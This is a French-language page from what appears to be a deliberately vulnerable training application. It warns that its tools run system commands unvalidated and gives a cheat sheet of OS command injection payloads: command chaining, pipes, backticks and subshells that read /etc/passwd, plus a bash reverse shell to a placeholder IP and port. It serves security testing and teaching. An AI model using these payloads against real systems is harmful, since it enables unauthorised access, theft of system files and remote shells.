ATTENTION: Ces pages contiennent des vulnerabilites volontaires pour tests uniquement!
Ces outils executent des commandes systeme sans validation des entrees.
; whoami ou && whoami| cat /etc/passwd$(whoami) ou `whoami`%0a whoamiVoici les commandes qui sont executees cote serveur:
| Technique | Payload | Resultat |
|---|---|---|
| Command chaining | localhost; id |
Execute les deux commandes |
| AND operator | localhost && cat /etc/passwd |
Execute si ping reussit |
| OR operator | invalid || whoami |
Execute si ping echoue |
| Pipe | localhost | ls -la |
Pipe la sortie |
| Backticks | `id` |
Substitution de commande |
| Subshell | $(cat /etc/passwd) |
Substitution de commande |
| Reverse shell | ; bash -i >& /dev/tcp/IP/PORT 0>&1 |
Connexion inverse |